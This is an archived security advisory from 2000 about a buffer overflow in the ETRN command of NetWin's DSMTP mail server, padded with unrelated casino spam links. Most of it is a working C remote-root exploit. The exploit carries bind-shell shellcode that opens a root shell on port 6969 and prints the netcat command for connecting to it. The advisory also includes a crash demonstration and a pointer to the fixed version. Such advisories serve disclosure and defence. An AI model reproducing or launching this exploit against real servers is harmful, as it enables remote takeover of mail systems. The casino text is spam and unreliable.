Casinos Not On Gamstop Non Gamstop Casinos Casinos Not On Gamstop Online Casinos UK Non Gamstop Casino
5th Jun 2000 [SBWID-2427]
COMMAND
	    dsmtp
SYSTEMS AFFECTED
	    DMailWeb
PROBLEM
	    Eric  Andry  found  following.   He's  been  sitting on this for a
	    while,  but  dsmtp  (part  of  the  dmail package by NetWin) has a
	    buffer overflow in the ETRN  command, causing the server to  crash
	    and dump core.
	
	        NotNow>telnet localhost 25
	        Trying 127.0.0.1...
	        Connected to localhost.
	        Escape character is '^]'.
	        220 myhost.mydomain DSMTP ESMTP Server v2.8g
	        EHLO ""
	        250-myhost.mydomain. Hello "" (127.0.0.1)
	        250-ETRN
	        250-DSN
	        250 HELP
	        ETRN AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
	        Connection closed by foreign host.
	        NotNow>
	        NotNow>cd /usr/local/dmail
	        NotNow>ls -la core
	        -rw-------   1 root     root      1961984 Jun  1 13:42 core
	        NotNow>
	
	    A little over 260 A's would cauase the crash.  Tested on V.  2.8d,
	    e,  f,  and  g.  All  are  Beta Releases, never tested on "stable"
	    versions.  Here's the exploit:
	
	    /*
	    Netwin DSMTP Server v2.7q remote-root exploit
	    [email protected] | [email protected]
	    tested arch = x86/Linux mdk7.0
	    I will port this to Solaris & FreeBSD when I have time...
	    check http://gsu.linux.org.tr/~noir/ offsets for other Linux distros.
	    greetz: moog, si_ (happy birthday!), CronoS, still, teso crew,
	    gsu-linux, `B, calaz, olympos secteam
	    FOUND BY Eric Andry [email protected]
	    */
	    #include <stdio.h>
	    #include <unistd.h>
	    #include <string.h>
	    #include <stdlib.h>
	    #include <sys/socket.h>
	    #include <sys/types.h>
	    #include <netdb.h>
	    #include <netinet/in.h>
	    #include <sys/time.h>
	    unsigned char shellcode[]=  /* [email protected] */
	    "\x31\xc0\x40\x40\x89\x45\xf4\x48\x89\x45\xf8\x48\x89"
	    "\x45\xfc\xb0\x66\x31\xdb\x43\x8d\x4d\xf4\xcd\x80\x31"
	    "\xdb\x43\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x1b\x39"
	    "\x31\xdb\x89\x5d\xf0\x89\x45\xf4\x89\xc2\x8d\x45\xec"
	    "\x89\x45\xf8\xc6\x45\xfc\x10\x31\xc0\xb0\x66\x31\xdb"
	    "\xb3\x02\x8d\x4d\xf4\xcd\x80\x89\x55\xf8\x31\xc0\x40"
	    "\x89\x45\xfc\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x8d\x4d"
	    "\xf8\xcd\x80\x89\x55\xf4\x31\xc0\x89\x45\xf8\x89\x45"
	    "\xf8\x89\x45\xfc\xb0\x66\x31\xdb\xb3\x05\x8d\x4d\xf4"
	    "\xcd\x80\x89\xc2\x31\xc0\xb0\x3f\x89\xd3\x31\xc9\xcd"
	    "\x80\x31\xc0\xb0\x3f\x89\xd3\x31\xc9\xb1\x01\xcd\x80"
	    "\x31\xc0\xb0\x3f\x89\xd3\x31\xc9\xb1\x02\xcd\x80"
	    /* generic shellcode execve(args[0],args,0);  aleph1 */
	    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
	    int resolv(char *hname, struct in_addr *addr);
	    #define RET_MDK70    0xbfff97ec
	    #define RET_REDHAT60 0xaabbccdd
	    #define RET_SLACK70  0xddccbbaa
	    #define NOP 0x90
	    #define ALIGN 1
	    int
	    main(int argc, char *argv[])
	    {
	            int fd, n;
	            int i, l;
	            unsigned char ovf[860];
	            char buff[200];
	            int offset = 0;
	            struct sockaddr_in servaddr;
	            if (argc < 2 ){
	            fprintf(stderr,"%s <host> [offset]\n",argv[0]);
	            exit(0);
	            }
	          if(argv[2])
	             offset=atoi(argv[2]);
	    printf("Netwin DSMTP v2.7q remote-root exploit by noir\n");
	            if( (fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){
	            perror("socket");
	            exit(-1);
	            }
	            bzero(&servaddr, sizeof(servaddr));
	            servaddr.sin_family = AF_INET;
	            servaddr.sin_port = htons(25);
	            if(!resolv(argv[1], &servaddr.sin_addr)){
	            herror("gethostbyname");
	            exit(-1); }
	            if(connect(fd, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0 ){
	            perror("connect");
	            exit(-1);
	            }
	            n = read(fd, buff, 1024);
	            write(STDOUT_FILENO, buff, n);
	            sleep(2);
	            fprintf(stderr, "check for portshell 6969/tcp when done\n");
	            memset(ovf, NOP, sizeof(ovf));
	            for( i = ALIGN; i < 300; i+=4)
	            *(long *) &ovf[i] = RET_MDK70 + offset;
	            for( i = 650, l = 0; l < strlen(shellcode) ;i++, l++)
	            ovf[i] = shellcode[l];
	            memcpy(ovf, "ETRN ", 5);
	            strcpy(ovf+858,"\r\n\0");
	            write(fd, ovf, strlen(ovf));
	            fprintf(stderr,"done!\n$ nc %s 6969\n", argv[1]);
	            return 1;
	    }
	    int
	    resolv(char *hname, struct in_addr *addr)
	    {
	            struct hostent *hp;
	    if ( (hp = gethostbyname(hname)) == NULL)
	            return 0;
	      memcpy((struct in_addr *)addr, (char *)hp->h_addr, sizeof(struct in_addr));
	            return 1;
	    }
	
SOLUTION
	    Netwinsite released  a new  version of  Dmail -  2.7r which  fixes
	    this exploit. It is available at
	
	        ftp://ftp.netwinsite.com/pub/dmail/
	
	    Currently, there are only Linux and Solaris versions available.
Internet highlights

Casino Not On Gamstop